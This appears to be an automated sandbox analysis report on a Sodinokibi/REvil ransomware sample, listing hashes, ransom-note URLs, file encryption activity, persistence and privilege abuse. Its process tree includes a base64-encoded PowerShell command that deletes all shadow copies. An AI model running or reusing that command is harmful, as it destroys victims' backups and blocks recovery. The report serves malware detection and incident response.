Analysis
-
max time kernel
142s -
max time network
141s -
platform
windows10_x64 -
resource
win10 -
submitted
06-07-2020 07:24
Static task
static1
Behavioral task
behavioral1
Sample
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe
Resource
win7
Behavioral task
behavioral2
Sample
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe
Resource
win10
General
-
Target
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe
-
Size
132KB
-
MD5
8ea56fd712f728e5ed1a7dcba86ca9e9
-
SHA1
1ed11049103a716f8a21f0fc7bcc07d20090871e
-
SHA256
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d
-
SHA512
fcb77610abde19b1bfa8c805293e015b98a65b6845f241bb8a25b94df9c8e3f7a4e8ce95825530c72118ce57d907f6e43dfb273127a40e118a446e81d3a86a13
Malware Config
Extracted
C:\tl794-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6B16E928B6458240
http://decryptor.cc/6B16E928B6458240
Signatures
-
Drops file in Program Files directory 33 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exedescription ioc process File opened for modification \??\c:\program files\OptimizeMove.AAC 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SubmitExport.mpv2 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\CloseSplit.ods 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File created \??\c:\program files\tl794-readme.txt 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\ShowRepair.xps 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SplitLock.vdw 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SyncShow.potm 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\UnpublishCopy.pptx 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\UnpublishRemove.docx 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\OptimizeConfirm.xla 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\StepSwitch.pot 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\InstallSwitch.ogg 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\MergeUpdate.au 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\RestoreInitialize.wav 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SkipSubmit.ram 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\StopLock.ADTS 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\UpdateStep.mpeg3 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\CompressResume.kix 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\InstallEnable.mp2 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\PingTrace.gif 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\ConvertRead.easmx 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\GroupAdd.txt 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\RestartClear.svgz 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SplitUnprotect.wax 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File created \??\c:\program files (x86)\tl794-readme.txt 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\PingRead.wvx 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\ReadMerge.vdw 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\ResizeApprove.ppsx 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\RevokeApprove.xsl 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SubmitEnable.aiff 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\SyncEdit.zip 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\WriteUpdate.vb 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe File opened for modification \??\c:\program files\DismountInvoke.TTS 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeBackupPrivilege 3232 vssvc.exe Token: SeRestorePrivilege 3232 vssvc.exe Token: SeAuditPrivilege 3232 vssvc.exe Token: SeTakeOwnershipPrivilege 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tQZ5HNPIrG = "C:\\Users\\Admin\\AppData\\Local\\Temp\\368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe" 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exepowershell.exepid process 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe 3824 powershell.exe 3824 powershell.exe 3824 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exedescription pid process target process PID 2976 wrote to memory of 3824 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe powershell.exe PID 2976 wrote to memory of 3824 2976 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\65i68nbkf5kx.bmp" 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe -
Processes:
368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\E6A3B45B062D509B3382282D196EFE97D5956CCB 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\E6A3B45B062D509B3382282D196EFE97D5956CCB\Blob = 030000000100000014000000e6a3b45b062d509b3382282d196efe97d5956ccb140000000100000014000000a84a6a63047dddbae6d139b7a64565eff3a8eca1040000000100000010000000b15409274f54ad8f023d3b85a5ecec5d0f00000001000000200000003e1a1a0f6c53f3e97a492d57084b5b9807059ee057ab1505876fd83fda3db8381900000001000000100000007ea7d53d76b46eea695a589c2bdbfdc65c0000000100000004000000000800001800000001000000100000006cf252fec3e8f20996de5d4dd9aef424200000000100000096040000308204923082037aa00302010202100a0141420000015385736a0b85eca708300d06092a864886f70d01010b0500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3136303331373136343034365a170d3231303331373136343034365a304a310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074312330210603550403131a4c6574277320456e637279707420417574686f7269747920583330820122300d06092a864886f70d01010105000382010f003082010a02820101009cd30cf05ae52e47b7725d3783b3686330ead735261925e1bdbe35f170922fb7b84b4105aba99e350858ecb12ac468870ba3e375e4e6f3a76271ba7981601fd7919a9ff3d0786771c8690e9591cffee699e9603c48cc7eca4d7712249d471b5aebb9ec1e37001c9cac7ba705eace4aebbd41e53698b9cbfd6d3c9668df232a42900c867467c87fa59ab8526114133f65e98287cbdbfa0e56f68689f3853f9786afb0dc1aef6b0d95167dc42ba065b299043675806bac4af31b9049782fa2964f2a20252904c674c0d031cd8f31389516baa833b843f1b11fc3307fa27931133d2d36f8e3fcf2336ab93931c5afc48d0d1d641633aafa8429b6d40bc0d87dc3930203010001a382017d3082017930120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186307f06082b0601050507010104733071303206082b060105050730018626687474703a2f2f697372672e747275737469642e6f6373702e6964656e74727573742e636f6d303b06082b06010505073002862f687474703a2f2f617070732e6964656e74727573742e636f6d2f726f6f74732f647374726f6f74636178332e703763301f0603551d23041830168014c4a7b1a47b2c71fadbe14b9075ffc4156085891030540603551d20044d304b3008060667810c010201303f060b2b0601040182df130101013030302e06082b060105050702011622687474703a2f2f6370732e726f6f742d78312e6c657473656e63727970742e6f7267303c0603551d1f043530333031a02fa02d862b687474703a2f2f63726c2e6964656e74727573742e636f6d2f445354524f4f544341583343524c2e63726c301d0603551d0e04160414a84a6a63047dddbae6d139b7a64565eff3a8eca1300d06092a864886f70d01010b05000382010100dd33d711f3635838dd1815fb0955be7656b97048a56947277bc2240892f15a1f4a1229372474511c6268b8cd957067e5f7a4bc4e2851cd9be8ae879dead8ba5aa1019adcf0dd6a1d6ad83e57239ea61e04629affd705cab71f3fc00a48bc94b0b66562e0c154e5a32aad20c4e9e6bbdcc8f6b5c332a398cc77a8e67965072bcb28fe3a165281ce520c2e5f83e8d50633fb776cce40ea329e1f925c41c1746c5b5d0a5f33cc4d9fac38f02f7b2c629dd9a3916f251b2f90b119463df67e1ba67a87b9a37a6d18fa25a5918715e0f2162f58b0062f2c6826c64b98cdda9f0cf97f90ed434a12444e6f737a28eaa4aa6e7b4c7d87dde0c90244a787afc3345bb442 368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe"C:\Users\Admin\AppData\Local\Temp\368dfd0ce07c2010b0bcfc05b60c653d285b9b201c0da60c3be6f6110a89140d.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Adds Run entry to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Modifies system certificate store
PID:2976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3824
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3844
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:3232